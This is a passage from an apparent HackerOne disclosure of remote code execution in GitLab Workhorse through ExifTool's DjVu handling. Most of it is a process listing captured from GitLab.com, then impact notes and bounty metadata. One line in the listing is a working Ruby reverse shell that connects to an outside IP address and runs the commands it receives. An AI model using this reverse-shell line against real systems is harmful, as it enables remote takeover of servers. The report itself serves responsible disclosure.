0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T07:29:46", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T07:29:46", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T07:29:46", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQTAOF5WFU%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T072946Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHcaCXVzLXdlc3QtMiJHMEUCIQDfIhnwO19hOr7x6mwnlijKd7sxaVo20xccQ7crZ8b04wIgQ5Mbc3sG0FsKjztYvSMKE4A1OT3fc3WyeanJXg7T%2Bxkq%2BgMIEBACGgwwMTM2MTkyNzQ4NDkiDDKJ3Rl7mbsTUo7dXSrXAwr1Zbd%2Frokvt9rD9OsPSAzYEYIO%2Bq36NRhjyPH3lijaaowET5iBs6LKUJTPBnQ5meqrZZobcXpTnJIlbJrUaAInWjV8CdnKKxYIwup%2BXVkpfE5TgmJJ2hvhCcXf%2B9NExAZhj4HaU90DR8kF2oIfrYXrC%2FzJOScP%2FIQNEPGnPqY8hWJHoC5rmRGzKSOzMIuvbKeLhHUDOINlGiv33HszzSDbk%2F6cVRkjxxljlYYgd2U1Rfpa1C967yJWKDbzqggVd1dh5V8Lbncg0E2JfZpXM%2Fn%2FXkeDCwyE8XXNnPmHSHZ6gvnGhcpnGMKvfdvhy1AR1bK5KoIj0jBtCy40htt2m8PtvmJ9BIbJ4xsfSbzM9ngQyiF8CKFHXeyUcv%2